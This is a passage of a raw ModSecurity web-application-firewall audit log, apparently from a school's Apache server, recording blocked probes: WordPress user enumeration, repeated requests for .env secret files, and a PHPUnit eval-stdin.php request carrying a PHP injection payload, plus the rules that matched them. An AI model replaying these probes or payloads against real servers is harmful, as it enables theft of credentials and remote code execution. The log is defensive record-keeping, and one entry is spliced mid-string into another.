Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747372625774054 3143 (- - -) Stopwatch2: 1747372625774054 3143; combined=1323, p1=460, p2=834, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba33af1c-Z-- --309b9179-A-- [16/May/2025:12:26:27 +0700] aCbMg8e47ocjCGWTS4b5XwAAAEg 103.236.140.4 41384 103.236.140.4 8181 --309b9179-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.12.230.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.12.230.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --309b9179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --309b9179-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747373187157301 3515 (- - -) Stopwatch2: 1747373187157301 3515; combined=1495, p1=457, p2=1006, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --309b9179-Z-- --30bf1a21-A-- [16/May/2025:12:34:49 +0700] aCbOedhEtho3ciA0wegfbwAAAIY 103.236.140.4 41476 103.236.140.4 8181 --30bf1a21-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 79.124.58.198 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 79.124.58.198 X-Forwarded-Proto: http Connection: close Content-Length: 19 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded --30bf1a21-C-- --30bf1a21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30bf1a21-H-- Message: Access denied with code 403 (phase 2). String match " --faa6df2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faa6df2b-E-- --faa6df2b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747375205471615 4776 (- - -) Stopwatch2: 1747375205471615 4776; combined=3087, p1=497, p2=2556, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faa6df2b-Z-- --69adff21-A-- [16/May/2025:13:11:52 +0700] aCbXKNe6THFz1hsaJaKP9AAAABQ 103.236.140.4 42260 103.236.140.4 8181 --69adff21-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.110.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.110.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69adff21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69adff21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747375912625568 854 (- - -) Stopwatch2: 1747375912625568 854; combined=330, p1=281, p2=0, p3=0, p4=0, p5=48, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69adff21-Z-- --a64d091c-A-- [16/May/2025:13:45:19 +0700] aCbe_9e6THFz1hsaJaKRCgAAABg 103.236.140.4 45912 103.236.140.4 8181 --a64d091c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.65.144.72 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.65.144.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a64d091c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a64d091c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747377919898592 685 (- - -) Stopwatch2: 1747377919898592 685; combined=295, p1=262, p2=0, p3=0, p4=0, p5=32, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a64d091c-Z-- --c1a6d231-A-- [16/May/2025:13:45:30 +0700] aCbfCkE0LfP59mkCzg72zgAAAM0 103.236.140.4 45924 103.236.140.4 8181 --c1a6d231-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.230.234.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.230.234.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1a6d231-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1a6d231-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747377930403165 3139 (- - -) Stopwatch2: 1747377930403165 3139; combined=1397, p1=456, p2=912, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1a6d231-Z-- --60021223-A-- [16/May/2025:14:31:08 +0700] aCbpvNhEtho3ciA0weghPgAAAIw 103.236.140.4 46646 103.236.140.4 8181 --60021223-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.153.78.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.153.78.59 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --60021223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60021223-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747380668273782 787 (- - -) Stopwatch2: 1747380668273782 787; combined=323, p1=282, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60021223-Z-- --9346933b-A-- [16/May/2025:14:34:16 +0700] aCbqeMe47ocjCGWTS4b6_AAAAE8 103.236.140.4 46688 103.236.140.4 8181 --9346933b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 60.13.156.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 60.13.156.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9346933b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9346933b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747380856298794 3365 (- - -) Stopwatch2: 1747380856298794 3365; combined=1479, p1=502, p2=946, p3=0, p4=0, p5=31, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9346933b-Z-- --72fd4850-A-- [16/May/2025:14:55:21 +0700] aCbvace47ocjCGWTS4b7DQAAAFc 103.236.140.4 46964 103.236.140.4 8181 --72fd4850-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.247.170.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.247.170.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --72fd4850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72fd4850-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747382121493708 3414 (- - -) Stopwatch2: 1747382121493708 3414; combined=1463, p1=477, p2=949, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72fd4850-Z-- --894d1d71-A-- [16/May/2025:15:03:29 +0700] aCbxUUE0LfP59mkCzg73SwAAANU 103.236.140.4 47084 103.236.140.4 8181 --894d1d71-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.62.24.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --894d1d71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --894d1d71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747382609219568 2581 (- - -) Stopwatch2: 1747382609219568 2581; combined=1106, p1=343, p2=742, p3=0, p4=0, p5=21, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --894d1d71-Z-- --5d11fe58-A-- [16/May/2025:15:40:49 +0700] aCb6Ede6THFz1hsaJaKRhAAAAAc 103.236.140.4 47570 103.236.140.4 8181 --5d11fe58-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5d11fe58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d11fe58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849038026 775 (- - -) Stopwatch2: 1747384849038026 775; combined=346, p1=313, p2=0, p3=0, p4=0, p5=32, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d11fe58-Z-- --66dea357-A-- [16/May/2025:15:40:49 +0700] aCb6Ece47ocjCGWTS4b7RQAAAEI 103.236.140.4 47572 103.236.140.4 8181 --66dea357-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --66dea357-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66dea357-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849232758 695 (- - -) Stopwatch2: 1747384849232758 695; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66dea357-Z-- --ba4cd235-A-- [16/May/2025:15:40:49 +0700] aCb6Ede6THFz1hsaJaKRhQAAAA4 103.236.140.4 47574 103.236.140.4 8181 --ba4cd235-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ba4cd235-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba4cd235-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849428049 726 (- - -) Stopwatch2: 1747384849428049 726; combined=316, p1=290, p2=0, p3=0, p4=0, p5=26, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba4cd235-Z-- --623e7e51-A-- [16/May/2025:15:40:49 +0700] aCb6Ede6THFz1hsaJaKRhgAAAAw 103.236.140.4 47576 103.236.140.4 8181 --623e7e51-B-- GET /code/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --623e7e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --623e7e51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849621433 658 (- - -) Stopwatch2: 1747384849621433 658; combined=248, p1=217, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --623e7e51-Z-- --bf213d7a-A-- [16/May/2025:15:40:49 +0700] aCb6Ece47ocjCGWTS4b7RgAAAEE 103.236.140.4 47578 103.236.140.4 8181 --bf213d7a-B-- GET /db/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bf213d7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf213d7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849814800 680 (- - -) Stopwatch2: 1747384849814800 680; combined=248, p1=217, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf213d7a-Z-- --a34ffc7c-A-- [16/May/2025:15:40:50 +0700] aCb6EthEtho3ciA0weghbgAAAIk 103.236.140.4 47580 103.236.140.4 8181 --a34ffc7c-B-- GET /login/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a34ffc7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a34ffc7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850008285 763 (- - -) Stopwatch2: 1747384850008285 763; combined=327, p1=295, p2=0, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a34ffc7c-Z-- --54b31834-A-- [16/May/2025:15:40:50 +0700] aCb6EkE0LfP59mkCzg73agAAANg 103.236.140.4 47582 103.236.140.4 8181 --54b31834-B-- GET /api_v1/go/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --54b31834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54b31834-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850202388 734 (- - -) Stopwatch2: 1747384850202388 734; combined=306, p1=272, p2=0, p3=0, p4=0, p5=34, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54b31834-Z-- --86ffae02-A-- [16/May/2025:15:40:50 +0700] aCb6EthEtho3ciA0weghbwAAAIg 103.236.140.4 47584 103.236.140.4 8181 --86ffae02-B-- GET /api_v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --86ffae02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86ffae02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850396093 684 (- - 